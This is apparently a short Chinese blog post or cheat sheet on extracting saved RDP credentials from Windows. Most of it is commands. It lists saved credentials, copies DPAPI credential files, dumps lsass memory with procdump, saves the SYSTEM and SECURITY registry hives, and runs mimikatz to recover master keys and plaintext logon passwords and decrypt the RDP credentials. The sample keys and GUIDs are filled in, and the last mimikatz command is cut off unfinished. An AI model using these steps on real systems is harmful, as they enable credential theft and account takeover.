RDP导出
查看保存的凭据
cmdkey /list
dir /a %userprofile%\appdata\local\microsoft\credentials\*
- 将credentials下的文件Copy出来
mimikatz解析凭据
# 获取guidMasterKey
mimikatz "privilege::debug" "dpapi::cred /in:DFBE70A7E5CC19A398EBF1B96859CE5D" exit
导出lsass
- 下载 Procdump
- 管理员权限运行
procdump.exe -accepteula -ma lsass.exe lsass.dmp
获取MasterKey
- Copy出dmp文件
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::dpapi" exit
- 注册表
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SECURITY SECURITY.hiv
- 获取dpapi
mimikatz log "lsadump::secrets /system:SystemBkup.hiv /security:SECURITY.hiv"
- 记住 c2872cf6d6d4db31c6c8d33beb49b482e78e7ce3
- 解密系统 key 文件
- 找到文件C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\04ece708-132d-4bf0-a647-e3329269a012
mimikatz "dpapi::masterkey /in:04ece708-132d-4bf0-a647-e3329269a012 /system:c2872cf6d6d4db31c6c8d33beb49b482e78e7ce3" exit
获取密码
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
解密rdp凭据
mimikatz "dpapi::cred /in:DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:4b0c21d9bc33c07d44ee51033a808dd4473d13798d44d3ebc40ee0ff16b56f455f4085707e57a05d88d88457c9ba835ad65e7bacf68c5e5922a0601fdd7496dd
所有文件都放在mimikatz目录下
评论区